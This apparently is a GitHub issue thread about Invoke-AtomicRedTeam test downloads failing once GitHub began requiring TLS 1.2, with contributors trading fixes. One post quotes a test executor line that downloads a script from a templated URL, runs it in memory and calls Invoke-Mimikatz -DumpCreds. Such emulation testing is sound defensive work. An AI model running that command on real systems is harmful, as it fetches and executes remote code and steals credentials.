Closed cnotin closed 4 years ago
We have the SchUseStrongCrypto
registry key which applies these settings to all .net app, but it's under HKLM so it requires admin and I don't think it's a prerequisite for Invoke-ART so that might not do the trick...
We've decided to address this by updated the atomics themselves (the yaml files within the other github repo). This way the fix works for any/all execuction frameworks. You will see several PR's from Scoubi adding the fix in over there. thx
It works too :)
@clr2of8 , Did he fixed the issues ? , because I'm going trough the same issue now..
@WinterIsCommin which test in particular?
@cnotin Powershell - FileLess - T1059.001, test 1 & 3 for now.
Indeed it's missing the necessary code
@cnotin Fixed it by adding the following command before the web request For Example, file T1059.001.yaml
executor: command: | powershell.exe "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12" ; "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
That's the idea :) Actually this test could be modified to use the "powershell" executor instead of command_prompt to then call powershell.exe
You can submit a PR if you want
I added it in #30 for when
Invoke-WebRequestVerifyHash
is used, however many tests simply useInvoke-WebRequest
from PowerShell to download their prereq files. GitHub on its github.com now requires TLS 1.2 which prevents download for example:I tried adding the following in the .psm1 file but it doesn't look like to be sufficient:
Which is normal considering that it seems that a child powershell.exe is launched, so different context! I don't know very much the code so I don't know where we could inject it the best to ensure it applies to most of the code :)
A short term solution could be using raw.githubusercontent.com links (which still accepts TLS 1.0 and 1.1) instead of https://github.com//Dumpert/raw... but let's do better ;)